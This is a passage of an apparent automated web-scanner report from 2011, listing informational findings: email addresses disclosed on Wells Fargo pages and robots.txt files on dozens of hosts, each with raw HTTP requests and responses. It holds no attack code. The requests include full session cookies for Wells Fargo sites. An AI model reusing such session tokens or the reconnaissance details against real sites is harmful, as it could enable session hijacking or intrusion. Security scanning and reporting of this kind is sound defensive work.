HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 10:06:07 GMT
Content-type: text/html; charset=UTF-8
Content-Length: 13796


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Customer Service f
...[SNIP]...
<br/>reportphish@wellsfargo.com</li>
...[SNIP]...

18.16. https://www.wellsfargo.com/privacy_security/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy_security/ HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:58:56 GMT
Content-length: 7745
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Privacy & Security
...[SNIP]...
<br/>reportphish@wellsfargo.com
<br/>
...[SNIP]...

18.17. https://www.wellsfargo.com/privacy_security/fraud/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/fraud/

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy_security/fraud/ HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:58:51 GMT
Content-length: 7695
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Privacy an
...[SNIP]...
<br/>reportphish@wellsfargo.com<br/>
...[SNIP]...

18.18. https://www.wellsfargo.com/privacy_security/fraud/report/fraud

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/fraud/report/fraud

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy_security/fraud/report/fraud HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:58:57 GMT
Content-length: 5885
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Privacy and Securi
...[SNIP]...
<strong>reportphish@wellsfargo.com</strong>
...[SNIP]...

18.19. https://www.wellsfargoadvisors.com/js/contactUsFA.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargoadvisors.com
Path:   /js/contactUsFA.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/contactUsFA.js HTTP/1.1
Host: www.wellsfargoadvisors.com
Connection: keep-alive
Referer: https://www.wellsfargoadvisors.com/market-economy/economic-market-reports/stock-markets.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gridTracking=A2%20-%20The%20Week; s_sq=wsinternetglobal%2Cwspublic%3D%2526pid%253Dhttps%25253A%25252F%25252Fwww.wellsfargoadvisors.com%25252F%2526oid%253Dhttps%25253A%25252F%25252Fwww.wellsfargoadvisors.com%25252Fmarket-economy%25252Feconomic-market-reports%25252Fstock-markets.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:53:47 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 14 Jan 2011 22:47:46 GMT
ETag: "8c3-8e5-390c4880"
Accept-Ranges: bytes
Content-Length: 2277
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

var irtBuf = '';
var faBuf = '';
if(typeof(pfWin)=='undefined') {
var pfWin = false;
}

function buildIRT() {
irtBuf = '<div class="rightcolBox">';
irtBuf += '<h3>Contact Us</h3>';
...[SNIP]...
<a href="mailto:onlinefeedback@wellsfargoadvisors.com">
...[SNIP]...

19. Robots.txt file

There are 41 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


19.1. http://a1.bing4.com/imagenewsfetcher.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.bing4.com
Path:   /imagenewsfetcher.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a1.bing4.com

Response

HTTP/1.0 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Sat, 01 May 2010 21:49:12 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Cache-Control: public, max-age=15552000
Date: Tue, 19 Jul 2011 12:11:03 GMT
Connection: close

User-agent: *
Disallow: /

19.2. http://a2.bing4.com/imagenewsfetcher.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a2.bing4.com
Path:   /imagenewsfetcher.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a2.bing4.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 01 May 2010 21:49:12 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 26
Cache-Control: public, max-age=14211549
Date: Tue, 19 Jul 2011 12:11:03 GMT
Connection: close

User-agent: *
Disallow: /

19.3. http://a4.bing4.com/imagenewsfetcher.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a4.bing4.com
Path:   /imagenewsfetcher.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a4.bing4.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 01 May 2010 21:49:12 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 26
Cache-Control: public, max-age=14918931
Date: Tue, 19 Jul 2011 12:11:04 GMT
Connection: close

User-agent: *
Disallow: /

19.4. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.ver.adhd_search/slideshow/womensymptoms

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Tue, 19 Jul 2011 01:58:24 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

19.5. https://adfarm.mediaplex.com/ad/bk/994-1668-2054-5

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adfarm.mediaplex.com
Path:   /ad/bk/994-1668-2054-5

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1289502470000"
Last-Modified: Thu, 11 Nov 2010 19:07:50 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 19 Jul 2011 10:03:27 GMT
Connection: keep-alive

User-agent: *
Disallow: /

19.6. http://api.twitter.com/1/statuses/user_timeline.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:01:12 GMT
Server: Apache
Vary: Host,Accept-Encoding
Last-Modified: Tue, 12 Jul 2011 21:05:19 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Wed, 20 Jul 2011 02:01:12 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

19.7. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Wed, 20 Jul 2011 01:58:26 GMT
Date: Tue, 19 Jul 2011 01:58:26 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

19.8. https://blog.torproject.org/images/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://blog.torproject.org
Path:   /images/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blog.torproject.org

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:48 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 10 Dec 2008 20:24:38 GMT
ETag: "54a03f3-637-c8fed80"
Accept-Ranges: bytes
Content-Length: 1591
Cache-Control: max-age=1209600
Expires: Tue, 02 Aug 2011 02:00:48 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.7.2.3 2008/12/10 20:24:38 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

19.9. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn-cms.scout.com
Path:   /feeds/analyticsfeed.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn-cms.scout.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Location: http://cdn-cms.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
ETag: "0abd1598770cb1:d3f"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:04:56 GMT
Content-Length: 135
Connection: close
Akamai: True

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

19.10. http://cdn-forums.scout.com/adfeed.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn-forums.scout.com
Path:   /adfeed.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn-forums.scout.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Location: http://cdn-forums.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 00:08:38 GMT
Server: Microsoft-IIS/6.0
Server: MBRD-Static1
X-Powered-By: ASP.NET
Akamai: True
Date: Tue, 19 Jul 2011 12:04:56 GMT
Content-Length: 81
Connection: close
Akamai: True

...User-agent: *
Disallow:
Sitemap: http://mbd.scout.com/forumsitemapindex.aspx

19.11. http://feeds.bbci.co.uk/news/rss.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Server: Apache
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=1590
Expires: Tue, 19 Jul 2011 03:31:22 GMT
Date: Tue, 19 Jul 2011 03:04:52 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

19.12. http://fonts.googleapis.com/css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fonts.googleapis.com
Path:   /css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fonts.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 19 Jul 2011 01:59:47 GMT
Expires: Tue, 19 Jul 2011 01:59:47 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

19.13. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1031455071/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1031455071/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 19 Jul 2011 01:59:57 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

19.14. http://l.addthiscdn.com/live/t00/250lo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT
ETag: "df8ab7-1b-4a51dabdf10c0"
Content-Type: text/plain; charset=UTF-8
Date: Tue, 19 Jul 2011 01:59:35 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *


19.15. http://minerva.healthcentral.com/b/ss/cmi-choicemediacom/1/H.6-pdv-2/thcn27821391997858

Summary

Severity:   Information
Confidence:   Certain
Host:   http://minerva.healthcentral.com
Path:   /b/ss/cmi-choicemediacom/1/H.6-pdv-2/thcn27821391997858

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: minerva.healthcentral.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:25 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "23d16a-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www401
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

19.16. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://networkpresence.com.au
Path:   /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: networkpresence.com.au

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:55 GMT
Server: Apache
Last-Modified: Fri, 28 May 2010 07:21:31 GMT
ETag: "1369cc-130-5b2d74c0"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

19.17. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=80459853
Expires: Tue, 04 Feb 2014 09:02:24 GMT
Date: Tue, 19 Jul 2011 03:04:51 GMT
Connection: close

User-agent: *
Disallow: /

19.18. http://odb.outbrain.com/utils/ping.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: odb.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"28-1306768642000"
Last-Modified: Mon, 30 May 2011 15:17:22 GMT
Content-Type: text/plain
Content-Length: 28
Date: Tue, 19 Jul 2011 01:58:21 GMT
Connection: close

User-agent: *
Disallow: /



19.19. https://online.wellsfargo.com/signon

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /signon

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: online.wellsfargo.com

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:46:48 GMT
Content-length: 26
Content-type: text/plain
Last-modified: Fri, 29 May 2009 01:57:27 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /

19.20. http://paid.outbrain.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://paid.outbrain.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: paid.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"28-1306768642000"
Last-Modified: Mon, 30 May 2011 15:17:22 GMT
Content-Type: text/plain
Content-Length: 28
Date: Tue, 19 Jul 2011 01:58:19 GMT
Connection: close

User-agent: *
Disallow: /



19.21. https://secure.codero.com/order/v/shop

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.codero.com
Path:   /order/v/shop

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure.codero.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:51 GMT
Server: Apache/2.2
Vary: Host,Accept-Encoding
Last-Modified: Mon, 12 Jun 2006 18:43:46 GMT
ETag: "36066a-19-548fbc80"
Accept-Ranges: bytes
Content-Length: 25
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

19.22. https://secure2.internode.on.net/nodestore

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure2.internode.on.net
Path:   /nodestore

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure2.internode.on.net

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 10:08:04 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 15 May 2008 05:42:30 GMT
ETag: "209e3-a7-44d3e5cf95d80"
Accept-Ranges: bytes
Content-Length: 167
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /errors/
Disallow: /templates/
Disallow: /about/careers/
Disallow: /webtools/advisories/
Disallow: ~

User-agent: Googlebot-Image
Disallow: /


19.23. http://sensor2.suitesmart.com/sensor4.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sensor2.suitesmart.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:25 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 01:37:19 GMT
ETag: "1f003b-1a-49c70702b51c0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

19.24. http://static.suitesmart.com/cs/99845/tags/dfa.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.suitesmart.com
Path:   /cs/99845/tags/dfa.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.suitesmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 16 Feb 2011 19:17:23 GMT
ETag: "1a5d3-1a-49c6b216bf6c0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Tue, 19 Jul 2011 01:58:24 GMT
Connection: close
Cache-Control: no-store

User-agent: *
Disallow: /

19.25. http://themes.googleusercontent.com/static/fonts/molengo/v1/z1JWuCBrQt_Ta83eqIo6Dg.woff

Summary

Severity:   Information
Confidence:   Certain
Host:   http://themes.googleusercontent.com
Path:   /static/fonts/molengo/v1/z1JWuCBrQt_Ta83eqIo6Dg.woff

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: themes.googleusercontent.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 19 Jul 2011 01:59:49 GMT
Expires: Tue, 19 Jul 2011 01:59:49 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

19.26. https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wellsoffice.wellsfargo.com
Path:   /ceoportal/signon/index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wellsoffice.wellsfargo.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:42:29 GMT
Content-length: 27
Content-type: text/plain
Last-modified: Sat, 10 Jul 2010 03:27:46 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /


19.27. http://www.codero.com/images/design/menu_i7-promo.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.codero.com
Path:   /images/design/menu_i7-promo.png

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.codero.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:56 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 01 Apr 2011 16:15:45 GMT
ETag: "43ef04-93-b8de2e40"
Accept-Ranges: bytes
Content-Length: 147
Cache-Control: max-age=0, proxy-revalidate
Expires: Tue, 19 Jul 2011 01:59:56 GMT
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /hosting/
Allow: /

User-agent: Adsbot-Google
Allow: /hosting/
Allow: /

sitemap: http://www.codero.com/sitemap.xml

19.28. http://www.defaultroute.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.defaultroute.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.defaultroute.com

Response

HTTP/1.0 200 OK
Date: Tue, 19 Jul 2011 01:59:45 GMT
Server: Apache
X-Powered-By: PHP/5.3.2
X-Pingback: http://www.defaultroute.com/xmlrpc.php
Content-Length: 77
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.defaultroute.com/sitemap.xml.gz

19.29. http://www.google-analytics.com/__utm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Tue, 19 Jul 2011 01:59:22 GMT
Expires: Tue, 19 Jul 2011 01:59:22 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

19.30. http://www.googleadservices.com/pagead/conversion/1031455071/

Summary

Severity:   Information
Confidence:   Certain
